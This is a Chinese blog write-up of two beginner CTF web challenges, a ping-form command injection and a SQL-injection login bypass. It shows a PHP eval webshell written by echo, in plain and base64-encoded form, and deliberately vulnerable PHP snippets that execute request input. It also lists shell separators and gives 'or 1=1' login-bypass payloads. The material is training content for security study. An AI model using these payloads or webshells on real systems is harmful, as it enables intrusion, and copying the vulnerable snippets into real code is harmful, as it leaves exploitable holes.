[ACTF2020] 新生赛]Exec1

已于 2024-12-17 17:36:21 修改
阅读量1.9k 收藏 21
点赞数 25
分类专栏: CTF 文章标签: CTF 网络安全
于 2024-10-17 16:07:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zwm_20211031_475/article/details/143021204
版权

目录

0x01命令执行

[ACTF2020 新生赛]Exec1

1、解法1

2、解法2

3、总结

3.1php命令注入函数

3.2java命令注入函数

3.3常见管道符

0x02SQL注入

[极客大挑战 2019]EasySQL1

0x01命令执行

[ACTF2020 新生赛]Exec1

a18da2566d2f8216f6e7d14c87c2048c.png

86708cfb3b472b4fedbe90dc95b55154.png

1、解法1

ping本地,有回显,TTL=42,应该是修改过的,无法根据此判断系统类型。

分别尝试window和Linux系统命令,判断类型。

5db0dc87ad82102aaa95c674f18bcfc7.png

查看本级目录

1430bc6d1edc658702706e7411b2fa5e.png

遍历目录,查看上级目录

eb3fab2d336afcf03150a7565e6a32e1.png

查看上上级目录

7de50cd6c4fb29d62b01da25394d5514.png

查看上上上级目录(到顶了),发现flag文件名

439854ae751994986a284146bec4a788.png

读它

8bae1b825b03501c93a4523e7ff91780.png

2、解法2

写入webshell,用蚁剑连接

 直接写入
 echo '<?php eval($_POST[1]); ?>' > 1.php
 ​
 base64编码写入
 echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php

写入

6362a75126a3a3c04bacf669bb388f4d.png

验证

f7a95dc61d2d78ce3433947f81263b44.png

连接

f703673ed530659a010cbfbfe6891cdf.png

a891d0d3e304849628c29029cf7b3e92.png

4c9e181ab87362128c0c81cf849d1a45.png

3、总结

3.1php命令注入函数

 exec() 、
 shell_exec() 、
 system() 、
 popen() 、 
 passthru() 、 
 proc_open() 、
 反引号``

exec:该函数无回显需使用 echo 进行输出,且只返回执行后的最后一行结果

 <?php
 $sys = $_REQUEST['value'];
 $cmd = exec($sys);
 echo $cmd;
 ?>

shell_exec():无回显需使用 echo 或者 var_dump 进行输出,但返回结果所有内容

 <?php
 $sys = $_REQUEST['value'];
 $cmd = shell_exec($sys);
 var_dump( $cmd);
 ?>

反引号`` :反引号其实调用的是shell_exec()函数,当反引号中的变量可控时就会造成命令执行,且无回显。

 <?php
 $sys = $_REQUEST['value'];
 $cmd = `$sys`;
 echo $cmd;
 ?>

system():有回显且返回所有内容。最常见的命令执行方式。如果目标是LInux则执行 Bash 命令,如果是Windows则执行 cmd 命令。

 //简单例子
 <?php
 $sys = $_REQUEST['value'];
 $cmd = system($sys);
 ?>

在ACTF2020新生赛Exec1该题中,后端逻辑为:

 <?php 
 if (isset($_POST['target'])) {
     system("ping -c 3 ".$_POST['target']);
 }
 ?>

popen(comnand,mode):该函数通常用于打开进程文件指针,但如果传入的参数可控也可造成命令执行,且该函数无回显,通过echo 不回直接返回执行的结果,而是返回的是文件指针。

 <?php
 $sys = $_REQUEST['value'];
 $cmd = popen($sys,'r');
 var_dump($cmd); ;
 ?>

passthru():与 system() 类似,也可将输入的参数当做命令执行,且函数执行后有回显。

<?php
$sys = $_REQUEST['value'];
$cmd = passthru($sys);
?>

proc_open():执行一个命令,并且打开用来输入/输出的文件指针。 类似 popen() 函数,

 

3.2java命令注入函数

java.lang.Runtime、
ava.lang.ProcessBuilder、
java.lang.UNIXProcess/ProcessImpl

 

3.3常见管道符

windows

| 直接执行后面的语句
|| 如果前面执行的语句出错,那么才执行后面的语句
& 前面和后面的语句都会被执行
&& 前面语句出错后面的语句也不执行,只有前面的语句成功执行才执行后面的语句

linux

| 直接执行后面的语句
|| 如果前面执行的语句出错,那么才执行后面的语句
& 前面和后面的语句都会被执行
&& 前面语句出错后面的语句也不执行,只有前面的语句成功执行才执行后面的语句
; 前面的语句执行完成后,继续执行后面的语句。(特有)

 

 

0x02SQL注入

[极客大挑战 2019]EasySQL1

a8b648a89d0f66c166edd6faea056a78.png

c2e75b5a3e61c9e296f53ec29690eebd.png

发现是登录界面,根据题目描述的提示,判断是SQL注入

随意输入用户名和密码,用hackbar LoadURL

a71eb4c72f25c7bf741c12a8f93e7978.png

构造payload查看错误提示

/check.php?username=admin'aa--&password=1111
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'aa--' and password='1111'' at line 1

a7297c20c3cea47f9318324398150b47.png

根据提示可以分析出的信息有:

1、数据库:MariaDB
2、SQL后端逻辑:username='$username' and password='$password'

既然是登录框,那肯定是要登录上去看看的

/check.php?username=admin' or 1=1 --+&password='--+

e0153819382af8facaa6593a88378c32.png

发现flag

 

 

[ACTF2020 新生]Upload 1和[GXYCTF2019]Ping Ping Ping 1
qq_44122254的博客
02-16 391
打开靶场环境,发现是文件上传 检查前后端效验情况,检查源代码 存在前端效验,删除前端效验代码进行上传,后端也存在效验,过滤php文件,可选择phtml文件进行上传,写入phtml文件进行上传抓包看看 代码详情如下: 蚁剑连接查看flag [GXYCTF2019]Ping Ping Ping 1 打开靶场显示IP? 进行Linux查看,查看发现有空格过滤, 百度一波,空格过滤的绕过情况 有:%20(space)、%09(tab)、$IFS9、9、9、{IFS}$9、 {IFS}、IFS 都可以 进行
buuctf [ACTF2020 新生]Exec 1
hintll的博客
06-14 5020
[ACTF2020 新生]Exec 1 打开以后是 有个输入窗口有个ping 可能是sql注入,也有可能是命令执行漏洞 先ping一下本机地址:127.0.0.1 有回显: PING 127.0.0.1 (127.0.0.1): 56 data bytes 那就基本确定是命令执行漏洞: 命令执行有一个参考: https://blog.youkuaiyun.com/hintll/article/details/117790643?spm=1001.2014.3001.5501 直接上手: 先看一下目录: 127.0.0
[ACTF2020 新生]Exec
Knsec
05-13 2646
[ACTF2020 新生]Exec 正常输入一个ip地址进行ping操作,然后使用BP抓个包看看 先试试最常见的命令执行 发现正常的回显了,可以利用 cat 的命令 Linux常用命令 查看 flag 文件。 [SUCTF 2019]EasySQL 抓个包看看 初次测试,发现这里是存在 数字型注入 的,然后又发现很多的关键字都被过滤了 最后发现,可以使用show,进行堆叠注入,但是发现 flag 和 from 也都被过滤掉了 无奈的我就去找 writeup
[ACTF2020 新生]Exec1
m0_73982061的博客
03-16 300
发现当使用ping 127.0.0.1;ls(或ping 127.0.0.1 & ls)可以尝试ping通本地ip即127.0.0.1,有回显,显然为命令执行漏洞。即ping 127.0.0.1;因此我们可以通过cd方法查看上一级目录方法查找flag。可以成功,显然为linux系统,且;找到flag文件后,我们可以通过cat命令来读取。
[ACTF2020 新生] Exec
Sweet_vinegar520的博客
10-28 788
本题可以直接去翻找文件目录,毕竟包含 flag 的文件不一定每次都直接叫做 flag。此处其实。
[ACTF2020 新生]Exec 1
qq_43618536的博客
07-01 988
BUUCTF的[ACTF2020 新生]Exec 1
ACTF2020 新生]Exec 1
最新发布
03-24
### 关于 ACTF2020 新生 Exec 1 的解法 #### 解题背景 ACTF2020 新生中的 `Exec` 系列题目主要考察参者对 Linux 基础命令的理解与应用能力。具体来说,这些题目通常涉及文件操作、权限管理以及基本的脚本分析...
[ACTF2020 新生]Exec 1 感谢 Y1ng 师傅供题。
03-02
### ACTF2020 新生 Exec 1 题目解析 #### 背景介绍 ACTF2020新生中的`Exec 1`题目由Y1ng师傅提供,旨在考察参者对于PHP代码执行漏洞的理解以及如何利用这些漏洞来实现特定操作。 #### PHP命令连接符解释 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值